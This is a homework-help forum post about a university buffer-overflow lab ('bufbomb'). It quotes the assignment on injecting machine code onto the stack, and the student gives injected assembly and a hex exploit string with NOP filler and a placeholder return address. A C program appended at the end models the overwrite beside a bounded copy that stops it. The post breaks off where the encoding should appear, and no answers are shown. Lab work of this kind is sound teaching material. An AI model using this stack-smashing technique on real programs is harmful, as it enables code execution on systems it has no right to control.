Computers and Technology, 14.05.2021 04:30, skyyman

A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions. When the calling function (in this case getbuf) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code. Within the file bufbomb there is a function bang having the following C code:
int global_value = 0;

void bang(int val)
{
    if (global_value == cookie) {
        printf("Bang!: You set global_value to 0x%x\n", global_value);
        validate(2);
    } else
        printf("Misfire: global_value = 0x%x\n", global_value);
    exit(0);
}
Similar to Level 0 and 1, your task is to get bufbomb to execute the code for bang rather than returning to test. Before this, however, you must set global variable global_value to your team's cookie. Your exploit code should set global_value, push the address of bang on the stack, and then execute a ret instruction to cause a jump to the code for bang.
Some Advice:
You can use GDB to get the information you need to construct your exploit string. Set a breakpoint within getbuf and run to this breakpoint. Determine parameters such as the address of global_value and the location of the buffer.
Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this file with GCC and disassemble it with objdump. You should be able to get the exact byte sequence that you will type at the prompt.
Keep in mind that your exploit string depends on your machine, your compiler, and even your team's cookie. Do all of your work on a CSUG machine, and make sure you include the proper team name on the command line to bufbomb.
Watch your use of address modes when writing assembly code. Note that movl $0x4, %eax moves the value 0x00000004 into register %eax; whereas movl 0x4, %eax moves the value at memory location 0x00000004 into %eax. Since that memory location is usually undefined, the second instruction will cause a segfault!
Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions use PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the ret instruction.
I already figured out that the exploit code that should set global_value, push the address of bang on the stack, and then execute a ret instruction to cause a jump to the code for bang is:
movl $0x48e6b07d, 0x804e158
push $0x08049414
ret
which when I encode it, I get:
I also know that the size of my buffer is 0x28 in hexadecimal, so 40 in decimal. However, I don't know how to get the return address for the exploit code and I was wondering if you could help me. Also, for the text file that I will be submitting, if I am understanding correctly it should be 40 characters long plus the exploit code return address, so it should be like this?
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 c7
04 25 58 e1 04 08 7d b0
e6 48 68 14 94 04 08 c3
00 00 00 00 30 30 30 30
where 30 30 30 30 is the return address for the exploit code that I am having trouble finding?

Answers: 2
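
The return-pointer overwrite described in the question, modelled on a simulated stack frame and shown beside a bounded copy that prevents it. This is an added example, not part of the original post or the lab's code; the frame layout (40-byte buffer, then a 4-byte saved frame pointer, then the return address), the function names, and the LEGIT_RET and saved_fp values are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x28           /* 40 bytes, the buffer size given in the question */
#define LEGIT_RET 0x08041234u   /* constructed stand-in for the real return address */

/* Assumed layout: buffer, then saved frame pointer, then return address. */
struct frame {
    unsigned char buf[BUF_SIZE];
    uint32_t saved_fp;
    uint32_t ret;
};

/* Constructed input: 40 filler bytes, 4 zero bytes, 4 placeholder bytes of 0x30. */
static size_t make_input(unsigned char *out) {
    memset(out, 0x90, BUF_SIZE);
    memset(out + BUF_SIZE, 0x00, 4);
    memset(out + BUF_SIZE + 4, 0x30, 4);
    return BUF_SIZE + 8;
}

/* Copy with no check against buf; clamped to the frame so the model stays defined. */
static uint32_t unbounded_copy(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, in, n);
    return f->ret;
}

/* Bounded version: refuses anything that does not fit in buf. */
static int bounded_copy(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof f->buf) return -1;
    memcpy(f->buf, in, n);
    return 0;
}

/* Runs one variant on a fresh frame and returns the resulting return address. */
static uint32_t ret_after(int bounded) {
    struct frame f = { {0}, 0xbfff0000u, LEGIT_RET };  /* constructed saved_fp */
    unsigned char in[sizeof f];
    size_t n = make_input(in);
    if (bounded) { bounded_copy(&f, in, n); return f.ret; }
    return unbounded_copy(&f, in, n);
}

int main(void) {
    printf("unbounded: ret=0x%08x\nbounded:   ret=0x%08x\n", (unsigned)ret_after(0), (unsigned)ret_after(1));
    return 0;
}
```

With the unchecked copy the last four input bytes land in the return-address field; the length check leaves the field at its original value and rejects the input.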
